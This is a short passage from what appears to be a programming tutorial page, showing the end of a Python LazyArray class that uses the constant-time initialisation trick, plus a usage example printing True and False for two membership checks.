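            self.to[self.top] = i   # the top-th initialized slot is i
            self.top += 1

b = LazyArray(10)
b.add(3)
print(b.contains(3), b.contains(4))  # True False
</code></pre></div></div>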